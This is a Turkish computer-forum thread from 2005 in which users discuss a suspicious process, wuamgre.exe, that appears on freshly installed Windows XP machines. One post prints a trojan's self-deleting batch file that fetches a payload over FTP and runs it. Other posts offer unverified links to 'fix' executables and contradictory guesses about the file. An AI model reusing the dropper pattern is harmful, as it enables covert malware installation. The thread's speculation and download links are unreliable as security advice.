Şimdi Ara

wuamgre.exe.Bunu nasıl yapıyorlar?Helal olsun!!!

Daha Fazla
Bu Konudaki Kullanıcılar: Daha Az
2 Misafir - 2 Masaüstü
5 sn
13
Cevap
0
Favori
663
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
0 oy
Öne Çıkar
Sayfa: 1
Giriş
    Dün makinreyi formatladım sıfırdan xp kurdum.Bi okulun sayfasına gireyim dedim.İnternete bağlanır bağlanmaz geldi.Birileri TT'un kayıtlarını mı kontrol ediyor nedir.İlk ADSL bağlandığında da bağlandığım anda DLL enjection yemiştim.İlk bağlanırken derken internet exp. falan daha çalıştırmadan hattım açılmasıyla beraber girdi ve hiç bir program yüklü değilken.Daha da ilginci firewall ve msconfig bu exenin system32'de olduğunu söylüyor.Gizli dosyalarda dahil tarattım system32'de değil bilg. hiç bir yerinde öyle bir exe yok.
    wuamgre.exe nin ne olduğunu bilen birileri inşallah vardır.Yada bu işi nasıl yaptıklarını...

• Benim basimda da ayni dert var arastirmalarim sonucaunda sadece kore de birkac web sitesi buldum ama ise yarar bisi bulamadim. belki yanlis bir yoldayiz. ancak soyle bir durum var. sistemde calismaya basladiktan sonra ad-watch ile baktigim kadariyla sistem uzerinde calisan diger dosyalarin isimlerini kopyalayim 0 veya 1 kb boyutunda dosyalari sistem directorysinde olusturuyor ve bu dosyaari calistiriyor bu dosyalarda internet uzerinden islem yapiyor. bu w32.blast in calisma sistemine benziyor cunki cmd.exe dosyasi da sistem uzerinde o anda calsiyor. bat ve scr dosyalariyla da ftp calistirarak internet uzerinden dosya indiriyor. bunun bir adware oldugunu dusunuyorum ancak ad-aware se professional bununla ilgili hicbirsey bulamiyor. Symantec in sitesinde login.scr dosyasindan yola cikarak W32.Funsoul@mm virusu olabilecegini de buldum ancak bunlarin fixleri hicbir ise yaramiyor.

@echo off
    ftp -n -v -s:.pif
    SndMon16.exe
    del .pif
    del /F c.bat
    exit /y

sistem tarafindan c.bat dosyasi bi sekilde olusturulmus icerigi de boyle.

symantec corporate edition zaman zaman .pif dosyasinda
    bunun bir download trojan oldugunu soyledi fixblast dosyasiyla da windows un upgradelerinin yapilmasini sistemde birtakim aciklar bulundugunu soyledi. ancak ben sistemimi daha once takir takir calisan bir sistemden klonlamistim. makinamin hdd sini samsung hdd ile degistirdim ntfs calisiyor. ben windows un clonlanmadan once install ettigim sirada internete dsl araciligyla bagli olmasindan suphe ediyorum. Bir de sunu ilave edeyim nasil oldugunu cozemedim ancak sistem her acildiginda my documents folder i da aciliyor. bunun olayla bir baglantisi oldugundan eminim.

beyin cimlastigi yapip bir sonuc uretelim ne dersiniz.

kolayliklar

• Beyler baya dikkatli olunmalı nette buldum bende za felan direk geçirio engelleyemiyorsunuz ama zararlımıdır deilmi bilinmez araştırmak lazım
  • sanırım oldukça yeni bir şey bu. bende dün kurdum windows kurduğum gibi girmiş herhalde task managerdan bu wuamgre.exe yi kapamazsam nete bağlanmak imkansızlaşıyor. habire birşeyler yolluyor alet bir yerlere ama bulamadım ne olduğunu... fikri olan varmıdır bu konuda?
  • quote:

Orjinalden alıntı: 90doksun

sanırım oldukça yeni bir şey bu. bende dün kurdum windows kurduğum gibi girmiş herhalde task managerdan bu wuamgre.exe yi kapamazsam nete bağlanmak imkansızlaşıyor. habire birşeyler yolluyor alet bir yerlere ama bulamadım ne olduğunu... fikri olan varmıdır bu konuda?

evet bende dün yeni win kurdum... 1,5 ay kullandıgım KABAK gıbı wındowsta hıcbırsey yokken... Gıcır windowsum MODEMI acmam ıle yerle bır oldu... Üstelik wormblast bile bulaştı... Allahtan ghostlamıstık... Neyse önce bir adet sağlam bir antivirus sonra önemli kısım BİR ADET SAĞLAM BİR FIREWALL kurun... Tavsiyem MCAFEE 9.0 + PERSONAL FIREWALL kurmanız...

Sürekli bir yerlere upload yapıp, bağlantımı kastırmakta idi... Fırewall BUNU KESTİ....WWW.BULLETPROOFSOFT.COM dan da SPY REMOVER u kurup tarama yaptım CİLLOP OLDU... (http://www.bulletproofsoft.com/download/bpssr.exe )

saygılar... dosyayı bende araştırmadım ama ENTERESAN bir olay... Sanırım yeni bir zımbırtı anında BULAŞIYOR... SP1 KULLANAYIM DEDIM ne yazıkki sevmediğim SP2 ye dönmek zorunda kaldım... Artık sp1 kullanılmaz sanırım... DAYANMIYOR HICBIRSEYE...

< Bu mesaj bu kişi tarafından değiştirildi AmigamaN -- 6 Şubat 2005, 0:33:25 >

• Bir kaynaktan şunu buldum... Çekip kurun temizlesin kurtulun bu illetten yukarda yazdıklarımıda uygulayın ama...

http://files.webattack.com/localdl834/WinsockxpFix.exe

• hayır o değilde insan sıkarda iyi sıkar ya ne yanlış yolu ne saçmalarsınız siz? tam bir boş konuşma örnekleri yaaa.... Onun adı zararlı deil yararlı bi kere.Anlamı windows update manager kısaca wuamgre.exe die çıkar. Bu kadarda saçma cvplar atılmaz ya bilmiyorsanız birşey yazmayı verin olsun bitsin insanları yanlış yönlendirmeyelim...
  • Yapay Zeka’dan İlgili Konular
    Daha Fazla Göster
  • bağlantıyı tabiki yer netten güncelleştirme yapıor çünkü...
  • ismine bakarsak ya windows update ile ilgili yada kendini öyle gösteriyor...
  • quote:

Orjinalden alıntı: zoltrix

hayır o değilde insan sıkarda iyi sıkar ya ne yanlış yolu ne saçmalarsınız siz? tam bir boş konuşma örnekleri yaaa.... Onun adı zararlı deil yararlı bi kere.Anlamı windows update manager kısaca wuamgre.exe die çıkar. Bu kadarda saçma cvplar atılmaz ya bilmiyorsanız birşey yazmayı verin olsun bitsin insanları yanlış yönlendirmeyelim...

ne saçmalıyorsun sen? sanki bir tek sen anlıyorsun bu işlerden bizde eşşeğiz... biz anlamıyoruz aletin neyi download ettiğini neyi upload ettiğini... önce bi anlamaya çalış tamam mı? sonra konuş konuşacaksan... bu virüs o dediğin "Windows Update Manager" ine bulaşıyor ve bilgisayardan verileri yüklüyor bir yerlere...

bir daha da bilir bilmez ithamlarda bulunma kimseye böylesi forumlar senin gibi adamların boş sallayıp yutması için kullanılmıyor tamam mı?

• zoltrixinkide olasılık dahilinde ama sanırım bilgisayarını yeni almış bundan 2.5 3 sene önce microsofttan update ettigin dosyalarda trojan çıkabiliyordu halada var indirdigin herşey güvenli degil ayrıca lisanssızları bombaluyor microsoft diye geyik bi konuda hal var bende FDISK çekicektim çekmim bare tırstım şimdi ugraşılmaz
  • Benim netten indirdiğim bir XP proyu yükledikten sonra daha doğru dürüst birşey yapmadan trojanlar gelmişti. Sanırım XP'nin içine entegre edilmişti trojan ve worm lar.
  • quote:

Orjinalden alıntı: zoltrix

hayır o değilde insan sıkarda iyi sıkar ya ne yanlış yolu ne saçmalarsınız siz? tam bir boş konuşma örnekleri yaaa.... Onun adı zararlı deil yararlı bi kere.Anlamı windows update manager kısaca wuamgre.exe die çıkar. Bu kadarda saçma cvplar atılmaz ya bilmiyorsanız birşey yazmayı verin olsun bitsin insanları yanlış yönlendirmeyelim...

hımmm... Fazla yoruma gerek yok... win update manager ın adı o değil "wupdmngr.exe" boş boş konuşup yorum yapma... Zaten senın gıbıler yüzünden bu ülke ilerleyemiyor.. Yakında eline alırsın makinanı BU YOLDA DEVAM ET... Bişi değil o UPDATE MANAGER RAHAT OL... Adamlar bunu temizlemesi için program çıkartmışlar... Direk ip protocollere yapışıyor... He bi ara onun ne oldugunu bizede açıklarsan seviniriz. hayır lazımsa silmeyecez senin gibi UPDATE EDERİZ BİZDE...Birde ÇOK GAGANI AÇMA KIRARLAR...Son bişi daha İNSANLARI BIZ DOGRU yönlendiriyoz ama senin gibiler yine yoldan çıkarıyor... Bence sen bilmeden yazmasan daha iyi olacak... Hayır saçmalıyonda ondan iyiliğin için. Rezil olma yani...
    SAygılar...

< Bu mesaj bu kişi tarafından değiştirildi AmigamaN -- 8 Şubat 2005, 1:10:49 >

• 
Sayfa: 1
- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.